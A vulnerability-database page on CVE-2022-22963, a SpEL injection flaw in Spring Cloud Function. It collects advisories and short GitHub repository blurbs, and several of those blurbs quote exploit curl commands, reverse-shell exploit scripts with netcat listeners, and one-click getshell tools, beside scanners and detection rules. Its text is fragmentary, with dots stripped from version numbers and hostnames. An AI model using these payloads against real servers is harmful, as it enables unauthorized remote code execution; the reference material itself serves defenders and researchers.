

CVSSv4: NA | CVSSv3: 9.8 | CVSSv2: 7.5 | VMScore: 1000 | EPSS: 0.975 | KEV: Exploitation Reported
Published: 01/04/2022 Updated: 21/11/2024

Vulnerability Summary

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Vulnerability Trend

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Vendor Advisories

Synopsis Low: Release of OpenShift Serverless 1211 Type/Severity Security Advisory: Low Topic Release of OpenShift Serverless 1211Red Hat Product Security has rated this update as having a security impact of Low A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerab ...
Synopsis Low: Release of OpenShift Serverless Client kn 1211 Type/Severity Security Advisory: Low Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic Release of OpenShift Serverless Client kn 1211Red Hat Product Security has rated this update as having a security ...
On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 316, 322, and older unsupported releases was disclosed: CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression For a description of this vulnerability, see VMware Spring Framework Security Vu ...
CVE-2022-22963 Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2010-1622 Bypass ...
Two distinct spring project vulnerabilities where released recently with critical CVSS score and classified as zero-Day attacks The two vulnerabilities are currently known as : Spring4Shell: There is currently no fix available for the Spring4Shell vulnerability However we know that it affects products using the spring framework with a JDK 9 ...


Spring Cloud version 322 suffers from a remote command execution vulnerability ...
Spring Cloud Function versions prior to 317 and 323 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries By crafting a request to the application and setting the springcloudfunctionrouting-expression header, an unauthenticated attacker can gain remote code execution Both patched and u ...

Github Repositories

Scan systems and docker images for potential spring4shell vulnerabilities. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Spring4shell versions. Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang.

spring4shell-scanner This scanner will recursively scan paths including archives for spring libraries and classes that are vulnerable to CVE-2022-22965 and CVE-2022-22963 Currently the allow list defines non exploitable versions, in this case spring-beans 5318 and 5220 and spring cloud function context 323

CVE-2022-22963 Exploit Description In Spring Cloud Function versions 316, 322 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources more details can be found in the CVE-2022-22963 Detail Based on the PoC pr

Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)

Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963) Spring框架为现代基于java的企业应用程序(在任何类型的部署平台上)提供了一个全面的编程和配置模型。 Spring Cloud 中的 serveless框架 Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“springcloudfunctionrouting-expression”参

This enforces F5 WAF signatures for Spring4Shell and Spring Cloud vulnerabilities across all policies on a BIG-IP ASM device

f5-waf-enforce-sig-Spring4Shell This enforces signatures for the vulnerabilities Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963 across all policies on a BIG-IP ASM device Overview This script enforces all signatures present in the list below related to the vulnerabilities Spring4Shell and Spring Cloud across

SPeL-injection-study(CVE-2022-22963) 共分为环境搭建及漏洞复现、原理学习、POC编写三部分 一、环境搭建 IDEA新建spring initializr 这里生成jar包 在终端安装jdk11 java -jar jojoSPeL-001-SNAPSHOTjar 部署jar包 访问127001:8080验证 发送POC验证 POST /functionRouter HTTP/11 Host: 127001:8080 springcloudfunctionroutin

CVE-2022-22963 - Spring4shell To run the vulnerable SpringBoot application run this docker container exposing it to port 8080 Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 19216812:8080' -H $'springcloudfunctionrouting-expression

A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963) Vulnerable Application to CVE-2022-22963 CVE-2022-22963 Exploit Demo CVE-2022-22963mp4 Build docker pull me2nuk/cves:2022-22963 docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963 POC curl -X POST 0000:8080/functionRouter -H 

try to determine if a host is vulnerable to SpringShell CVE‐2022‐22965 and CVE‐2022‐22963

check-springshell This tool will try to determine if the host it is running on is likely vulnerable to CVE-2022-22963, a SpEL / Spring Expression Resource Access Vulnerability, as well as CVE-2022-22965, the so-called "SpringShell" RCE vulnerability This works very similar to the check-log4 tool, whereby it traverses the filesystem looking for Java archives, cracks t

Created after the release of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyzes their Manifest files.

springhound Created after the release of CVE-2022-22965 and CVE-2022-22963 Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used Unpacks JARs and analyzes their Manifest files Usage: /springhoundsh root_directory

Spring4Shell Burp Scanner

S4S-Scanner Burp Extension Spring4Shell Burp Scanner Extension Passive Scanner: It scan for keywords for Spring Boot error pages Active Scanner: It initialize Burp Collaborator and test /functionRouter path of the URL without any harmful activity for CVE-2022-22963, upload only like a text file for CVE-2022-22965 You can use with BurpSuite Extender and Jython Made with bare

CVE-2022-22963 research

SpringCloudFunction-Research CVE-2022-22963 research 環境 vulfocus/spring-cloud-function-rce:latest 成因 Request Header 中 springcloudfunctionrouting-expression 參數解析問題,造成注入Payload攻擊。 Reference hosch3ngithubio/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ wwwkitploitcom/2022/03/spring-spel-0day-po

CVE-2022-22963 RCE PoC Minimal example to reproduce CVE-2022-22963 remote code execution in orgspringframeworkcloud:spring-cloud-function-core Exploit Run the server mvn spring-boot:run Make a request curl -X POST -H 'springcloudfunctionrouting-expression: T(javalangRuntime)getRuntime()exec("touch PWNED")' -d

An exploit for the CVE-2022-22963 (Spring Cloud Function Vulnerability)

Exploit-for-CVE-2022-22963 Exploit using curl to get a reverse shell in vulnerable spring cloud environments This exploit abuses the functionRouter URI, by injecting code into the eval function of the Spring Framework through a post request with a header that gives us Remote Code Execution (RCE) Created by Henri Vlasic Linkedin Arthur Valverde Linkedin


Spring_All_Reachable 一款针对Spring漏洞框架进行快速利用的图形化工具 📝 TODO Spring Core RCE 支持更多类型内存马 支持内存马密码修改 🎬使用方法 Spring Cloud Gateway命令执行(CVE-2022-22947) 漏洞描述 Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Sp

CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable More information at wwwcyberkendracom/2022/03/rce-0-day-exploit-found-in-

CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.

CVE-2022-22963 Reverse Shell Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage To use this exploit, simply run the script with

spring-cloud-function SpEL RCE复现环境Config files for my GitHub profile.

spring-cloud-function SpEL RCE 漏洞编号:CVE-2022-22963 一个用于Spring Cloud Function SpEL表达式注入的测试环境 可以使用idea自己编译,也可以下载 release 直接启动 java11 运行 java -jar spel-001-SNAPSHOTjar 启动 搭建完访问本地8080端口

CVE-2022-22963 RCE PoC in python

CVE-2022-22963: Spring4Shell RCE Exploit This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=316 (for 31x) and <=322 (for 32x) Example Usage: # serving testsh on local webserver $ cat testsh #!/bin/bash whoami > /tmp/rce


Spring_All_Reachable 一款针对Spring漏洞框架进行快速利用的图形化工具 📝 TODO Spring Core RCE 支持更多类型内存马 支持内存马密码修改 🎬使用方法 Spring Cloud Gateway命令执行(CVE-2022-22947) 漏洞描述 Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Sp

Spring4Shell RCE Demo

Spring4Shell RCE Demo for CVE-2022-22965 Types of demo spring-mvc (with spring-boot) deployed as a war to Apache Tomcat spring-boot war with jsp, to be run as java -jar spring-boot jar without jsp, to be run as java -jar While the first spring-mvc in Apache Tomcat is vulnerable, the latter two types -- where spring-boot runs in Embedded Tomcat Servlet Container -- do not app

{ Spring Core 0day CVE-2022-22963 }

Spring Core RCE - CVE-2022-22963 Following Spring Cloud, on March 29, another heavyweight vulnerability of Spring broke out on the Internet: Spring Core RCE The Circulating coding poc: The exploit has been uploaded as exppy The official Spring patch is also in active production Patch Links in Spring Production The vulnerability affects: jdk version 9 and above using Spri

SpringCore-0day A Chinese security researcher user shared, and then deleted the information that by sending crafted requests to JDK9+ SpringBeans-using applications, under certain circumstances, that they can remotely: Modify the logging parameters of that application to achieve an arbitrary write Use the modified logger to write a valid JSP file that contains a webshell Use

Spring Cloud Function Vulnerability (CVE-2022-22963) RCE This is a python implemetation of Spring4Shell, CVE-2022-22963, affecting services running Spring Cloud Function <=316 (for 31x) and <=322 (for 32x) Combination of multiple POCs online Author: Randall Banner Date: 17/04/23 Description: Script creates shellsh in current directory, with a simple bash

Sentinel_Analtic_Rules #Test_Emotet Related IP addresses Description While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times

fscan 最近更新 [+] 2022/6/30 poc添加 CVE-2021-21972-vmcenter-RCEyml CVE-2021-22005-vmcenter-upload-toRCEyml CVE-2022-22954-VMware-RCEyml CVE-2022-22963-Spring-SpEL-RCEyml [+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf porttxt,rdp模块加入多线程爆破demo, -br xx指定线程 [+] 2022/2/25 新增-m webonly,跳

A collection of Github gists.

awesome-gists Terraform AWS WAFv2 for Log4JRCE (CVE-2021-44228, CVE-2021-45046) and Spring4ShellRCE (CVE-2022-22963, CVE-2022-22965)

Awesome-Redteam 【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 法律法规。 快速导航 攻防渗透常用命令 重要端口及服务速查 目录 Awesome-Redteam 快

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Spring4Shell Vulnerability Scanner for Windows


Binaries for CVE-2022-22963

CVE-2022-22963 Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service Disclamier: This is for educational purposes only The author is not responsible for the use of this program Use under your own risk Usage /CVE-2022-22963 -h Usage: CVE-2022-22963 [OPTIONS] Application Options: -u, --target-url= Target/Host url where 'Spring Cloud�

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable More information at wwwcyberkendracom/2022/03/rce-0-day-exploit-found-in-

Everything I needed to understand what was going on with "Spring4Shell" - translated source materials, exploit, links to demo apps, and more.

springcore-0day-en These are all my notes from the alleged confirmed! 0day dropped on 2022-03-29 This vulnerability is commonly referred to as "Spring4Shell" in the InfoSec community - an unfortunate name that calls back to the log4shell cataclysm, when (so far), impact of that magnitude has not been demonstrated I hope this repository helps you assess the situation

Spring PetClinic Sample Application Lacework Vulnerability Scanner There are many steps involved in building and deploying a containerized application, a complete container image lifecycle approach is key to managing software supply chain risks The Lacework inline remote scanner allows you to integrate Lacework security capabilities deeply into your software supply chain wor

Reproducing spring rce vulnerability and nuclei template

Spring RCE This repository provide vulnerable applications to CVE-2022-22963 and CVE-2022-22965 Also, You can find nuclei templates to check vulnerabilities CVE-2022-22965 vulnerable application original repository: Spring4Shell-POC Download Repository git clone githubcom/justmumu/SpringShellgit Steps For CVE-2022-22965 $ cd &

Curates resources to defend against SpringShell/Spring4Shell vulnerabilities.

Awesome Lists: #Spring4Shell #SpringShell 😎 Awesome lists about all things related to #Spring4Shell #SpringShell A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding Spring Framework versions prior to 5220 and 5318 contain a remote code execution vulnerability known as Spring4Shell Spring Project

This is a POC for CVE-2022-22963

CVE-2022-22963-Poc-Bearcules This is a POC for CVE-2022-22963 I wrote this in bash I am new to Scripting and this is my first Script Disclaimer >> I am not Responsible for any miss use or abuse when using this POC for learning and educational purposes only Thank You


SpringbootGuiExploit 漏洞利用工具测试版 闲着没事写一个小工具 漏洞利用工具采用javafx开发 环境jdk18版 Jdk11版 收录漏洞 +++ Springboot Gateway RCE(CVE-2022-22947) 一键检测漏洞 一键getshell +++Spring Cloud Function SpEL RCE (CVE-2022-22963) 一键检测漏洞 一键反弹shell +++Spring Framework RCE (CVE-2022-22965) 一键检测漏洞


没事写一个工具 SpringbootGuiExploit漏洞利用工具采用javafx开发 环境jdk18版 收录漏洞 +++ Springboot Gateway RCE(CVE-2022-22947) 一键检测漏洞 一键getshell +++Spring Cloud Function SpEL RCE (CVE-2022-22963) 一键检测漏洞 一键反弹shell +++Spring Framework RCE (CVE-2022-22965) 一键检测漏洞 一键getshell 优化http网站漏洞检测 优


SpringExploitGUI_v10 0x01 前言 ​ 今天复现了几个spring之前的漏洞,顺手就武器化了下,工具目前支持Spring Cloud Gateway RCE(CVE-2022-22947)、Spring Cloud Function SpEL RCE (CVE-2022-22963)、Spring Framework RCE (CVE-2022-22965) 的检测以及利用,目前仅为第一个版本,后续会添加更多漏洞POC,以及更多的持久化利用方


spring CVE_2022_22947,CVE_2022_22963,CVE_2022_22965 禅道(zentao)QVD_2024_15263 Nacos 认证绕过,默认key等漏洞 spring漏洞利用 nacos proxy 仅用于学习,还存在许多不足之处

Table of Contents Enumeration Information Ghatering HTTP\80 Privilege Escaletion as Phil Privilage Escaletion as Root Enumeration Let's the work with a simple scan for check if the hosts is up nmap -sn 101011204 Starting Nmap 794SVN ( nmaporg ) at 2023-12-17 15:56 EST Nmap scan report for 101011204 Host is up (0038s latency) Nmap done: 1 IP address

spring4shell-scan A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities Features Support for lists of URLs Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants) Fuzzing for HTTP GET and POST methods Automatic validation of the vulnerability upon discovery Randomized and n

Curates resources to defend against SpringShell/Spring4Shell vulnerabilities.

Last Updated May 2024 Spring4Shell (SpringShell) Resource List A curated list of resources for understanding and addressing the Spring4Shell (SpringShell) remote code execution vulnerability in Spring Framework (CVE-2022-22965) Official Spring Resources Spring Framework RCE Vulnerability Official Announcement CVE-2022-22965 Vulnerability Details Spring Cloud Function CVE Publ

CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit

CVE-2022-22963 CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_漏洞复现 需要有Docker环境 启动漏洞环境方式1 git clone githubcom/RanDengShiFu/CVE-2022-22963git;cd CVE-2022-22963;bash Startsh 启动漏洞环境方式2 rm -rf CVE-2022-22963/;mkdir CVE-2022-22963/;cd CVE-2022-22963/;git clone githubcom/N1ce75

Hack the Box - Machine - Inject

Inject Hack the Box - Machine - Easy apphacktheboxcom/machines/Inject Machine IP: 1012924493 Recon I start all CTFs by running nmap to view open ports and include the flags for running default scripts (-sC) and probing open ports for service/version info (-sV) Port 22 is almost always useless until we have credentials, so let's start with opening Burp Sui

Spring Cloud Function SpEL - cve-2022-22963

Spring Cloud Function SpEL - cve-2022-22963 Build $ git clone githubcom/twseptian/cve-2022-22963git $ cd cve-2022-22963 $ docker build -t spring-spel-0day $ docker run -p 8080:8080 --name spring-spel-0day spring-spel-0day Payload springcloudfunctionrouting-expression:T(javalangRuntime)getRuntime()exec("ping -c5 172

Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ (CVE-2022-22965 aka "Spring4Shell")

CVE-2022-22965 aka "Spring4Shell" Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ El objetivo es centralizar la mayor cantidad de información de público conocimiento hasta el momento de la vulnerabilidad y poder saber qué acciones tomar en tal caso ¿Mi aplicación es vulnerable? Las condiciones (AND) que se

开源工具 SpringBoot-Scan 的GUI图形化版本,对你有用的话麻烦点个Star哈哈~ 注意:本工具内置相关漏洞的Exp,杀软报毒属于正常现象! 新版本工具使用 python3 mainpy VulHub 漏洞测试环境搭建 git clone githubcom/vulhub/vulhubgit 安装Do

Spring Cloud Function - SpEL Injection (CVE-2022-22963) cd spring-cloud-function-samples/function-sample-pojo && mvn clean package -DskipTests && java -jar target/function-sample-pojo-200RELEASEjar codeql database create spring-cloud-function-32X-DB -l java -j0 --search-path /path/to/codeql -c "

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of githubcom/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POCpy By default whoami is executed on the target and a file vulnerabletxt is created with the URLs that are vulnerable Exploiting the vulnerability is quite easy to accomplish Here is reported the curl

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

CVE-2022-22963 (spring cloud function sple rce) spring cloud function 一键利用工具! by charis 博客charis3306top/ 已打包为exe文件开箱即用 命令主题 usage: Spring-cloud-function-spel02exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD] spring cloud function 一键利用工具! by charis 博客ht

Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function

Exploit for RCE in Spring Cloud (CVE 2022-22963) Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function See for details about the vulnerability here and here PoC Run the netcat on your host: $ nc -lvnp 9001 Run the exploit (example) with default port 9001 on attacker host: $ /exploitsh sitecom 101014122 ---[Rev

Rust-based exploit for the CVE-2022-22963 vulnerability

CVE-2022-22963 Exploit This repository contains a Rust-based exploit for the CVE-2022-22963 vulnerability found in Spring Cloud Function versions 316, 322, and older unsupported versions The vulnerability allows remote code execution and access to local resources through a specially crafted Spring Expression (SpEL) used as a routing-expression Description In Spring Cloud

This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell".

Spring CVE This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell" CVE-2022-22963 In Spring Cloud Function versions 316, 322 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted S

Spring Cloud Function Vulnerable Application / CVE-2022-22963

Spring Cloud Function Vulnerability(CVE-2022-22963) Vulnerable Application to CVE-2022-22963 CVE-2022-22963 Exploit Demo CVE-2022-22963mp4 Build docker pull me2nuk/cves:2022-22963 docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963 POC curl -X POST 0000:8080/functionRouter -H 

🔒 An Awesome List of SpringShell/Spring4shell resources

😎 Awesome lists about all things related to #Spring4Shell #SpringShell A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding Spring Framework prior to versions 5220 and 5318 contains a remote code execution vulnerability known as Spring4Shell Spring Project Official Spring project on published CV

Advance Spring4Shell RCE Vulnerability Scanner.

S4SScanner Advance Spring4Shell RCE Vulnerability Scanner S4SScanner is advance Spring4Shell RCE CVE-2022-22965 Vulnerability scanner that can search every url and check for vulnerability Main Features Web Crawler Scan Spring4Shell RCE Documentation install git clone githubcom/thenurhabib/s4sscannergit cd s4sscanner p

SpringScan 漏洞检测 Burp插件

SpringScan Burp 检测插件 支持检测漏洞 Spring Core RCE (CVE-2022-22965) Spring Cloud Function SpEL RCE (CVE-2022-22963) Spring Cloud GateWay SPEL RCE (CVE-2022-22947) 回连平台 Dnglog (默认) BurpCollaboratorClient Ceye Digpm 支持自定义回连平台 CVE-2022-22965 检测方法 利用条件 JDK9及其以上版本; 使⽤了Spring-beans包;

CVE-2022-22963-Reverse-Shell-Exploit This is a Python script that exploits CVE-2022-22963, a remote code execution vulnerability in Spring Cloud Function that allows attackers to execute arbitrary code on a vulnerable server The exploit uses the vulnerable /functionRouter endpoint to execute a command on the target server Usage Install the required Python libraries by running

Lazy SPL to detect Spring4Shell exploitation

Spring4Shell-Detection with Splunk Lazy SPL to detect CVE-2022-22965 - Spring4Shell & CVE-2022-22963 exploitation Find more awesome Threat Hunting SPL queries, including BPFDoor detection here Detecting & Responding to Spring4Shell with Splunk | Medium Read my write up here Detecting & Responding to Spring4Shell with Splunk | Medium Detection for Spring

First step we need to do is, recon PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 82p1 Ubuntu 4ubuntu05 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA) | 256 d51c81c97b076b1cc1b429254b52219f (ECDSA) |_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519) 8080/tcp open nagios-nsca Nagios NSCA |_http-title: Home

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